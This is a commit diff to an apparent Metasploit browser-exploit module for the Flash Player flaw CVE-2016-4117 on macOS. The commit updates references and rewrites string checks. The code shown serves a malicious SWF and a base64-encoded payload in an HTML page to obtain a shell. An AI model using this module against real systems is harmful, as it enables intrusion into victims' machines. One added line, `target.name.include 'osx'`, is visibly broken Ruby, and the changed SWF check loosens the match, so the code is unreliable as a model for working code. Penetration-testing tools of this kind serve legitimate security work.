update references, remove unused metadata, use more straightforward string operations
parent
0dab74a71f
commit
a7e8afe760
|
@ -27,14 +27,16 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
'References' =>
|
||||
[
|
||||
['CVE', '2016-4117'],
|
||||
['URL', 'https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4117'],
|
||||
['URL', 'https://www.fireeye.com/blog/threat-research/2016/05/cve-2016-4117-flash-zero-day.html']
|
||||
['BID', '90505'],
|
||||
['URL', 'https://www.fireeye.com/blog/threat-research/2016/05/cve-2016-4117-flash-zero-day.html'],
|
||||
['URL', 'http://www.securitytracker.com/id/1035826'],
|
||||
['URL', 'https://helpx.adobe.com/security/products/flash-player/apsa16-02.html'],
|
||||
['URL', 'https://helpx.adobe.com/security/products/flash-player/apsb16-15.html'],
|
||||
],
|
||||
'Payload' =>
|
||||
{
|
||||
'DisableNops' => true
|
||||
},
|
||||
'SessionTypes' => ['shell'],
|
||||
'Platform' => ['osx'],
|
||||
'BrowserRequirements' =>
|
||||
{
|
||||
|
@ -83,7 +85,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
def on_request_exploit(cli, request, target_info)
|
||||
print_status("Request: #{request.uri}")
|
||||
|
||||
if request.uri =~ /\.swf$/
|
||||
if request.uri.end_with? 'swf'
|
||||
print_status('Sending SWF...')
|
||||
send_response(cli, @swf, 'Content-Type' => 'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache')
|
||||
return
|
||||
|
@ -94,11 +96,11 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
def exploit_template(cli, target_info)
|
||||
swf_random = "#{rand_text_alpha(rand(3..7))}.swf"
|
||||
swf_random = "#{rand_text_alpha(3..7)}.swf"
|
||||
target_payload = get_payload(cli, target_info)
|
||||
b64_payload = Rex::Text.encode_base64(target_payload)
|
||||
|
||||
if target.name =~ /osx/
|
||||
if target.name.include 'osx'
|
||||
platform_id = 'osx'
|
||||
end
|
||||
html_template = %(<html>
|
||||
|
|
Loading…
Reference in New Issue